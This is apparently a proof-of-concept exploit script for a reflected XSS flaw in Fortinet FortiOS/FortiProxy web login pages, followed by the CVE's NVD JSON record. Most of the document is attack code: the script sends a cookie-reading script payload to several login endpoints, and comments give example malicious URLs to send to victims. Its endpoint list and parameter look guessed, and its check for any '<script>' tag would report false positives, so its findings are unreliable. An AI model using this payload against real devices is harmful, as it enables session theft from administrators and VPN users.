CVE-2025-31366

# CVE-2025-31366 - Fortinet FortiOS/FortiProxy Reflected XSS PoC # Vulnerability: Improper Neutralization of Input During Web Page Generation (CWE-79) # Affected: FortiOS 6.4-7.6.3, FortiProxy 7.0-7.6.3, FortiSASE 25.2.a import requests import urllib.parse TARGET_URL = "https://target-fortinet-device" # Reflected XSS payload - injected via URL parameter XSS_PAYLOAD = "<script>alert(document.cookie)</script>" # Common vulnerable endpoints in Fortinet devices VULNERABLE_PATHS = [ "/remote/login", "/remote/fgt_lang", "/sslvpn_logon.shtml", "/login", "/remote/logincheck" ] def craft_xss_url(target, path, param_name, payload): """Craft a malicious URL with XSS payload in the parameter""" encoded_payload = urllib.parse.quote(payload) malicious_url = f"{target}{path}?{param_name}={encoded_payload}" return malicious_url def exploit(target_url, path, param_name="redirect"): """Send crafted XSS request to the target""" url = craft_xss_url(target_url, path, param_name, XSS_PAYLOAD) print(f"[*] Malicious URL: {url}") try: # Send request - the payload will be reflected in the response response = requests.get(url, verify=False, timeout=10) print(f"[*] Status Code: {response.status_code}") # Check if payload is reflected in response if XSS_PAYLOAD in response.text or "<script>" in response.text: print("[+] XSS payload reflected in response - VULNERABLE!") return True else: print("[-] Payload not reflected - may be patched") return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": requests.packages.urllib3.disable_warnings() for path in VULNERABLE_PATHS: print(f"\n[*] Testing endpoint: {path}") exploit(TARGET_URL, path) # Example malicious URL that could be sent to a victim: # https://victim-fortigate/remote/login?redirect=javascript:alert(document.cookie) # https://victim-fortigate/sslvpn_logon.shtml?lang=en%22%3E%3Cscript%3Ealert(1)%3C/script%3E

{"cve": {"id": "CVE-2025-31366", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:37.423", "lastModified": "2026-01-14T10:16:04.207", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation vulnerability [CWE-79] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSASE 25.2.a may allow an unauthenticated attacker to perform a reflected cross site scripting (XSS) via crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "1B6548FD-E370-45D7-81D5-6EF892810052"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "C1C30E0D-7F09-42D2-9EB1-E2196BD50D75"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "4DA70753-E996-4081-9C13-7F60AC993B09"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:feature:*:*:*", "matchCriteriaId": "53197A72-5D08-4938-A415-72C573024BF3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:mature:*:*:*", "matchCriteriaId": "2603C391-AEC6-450A-A30A-4F8682F9565D"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-542", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}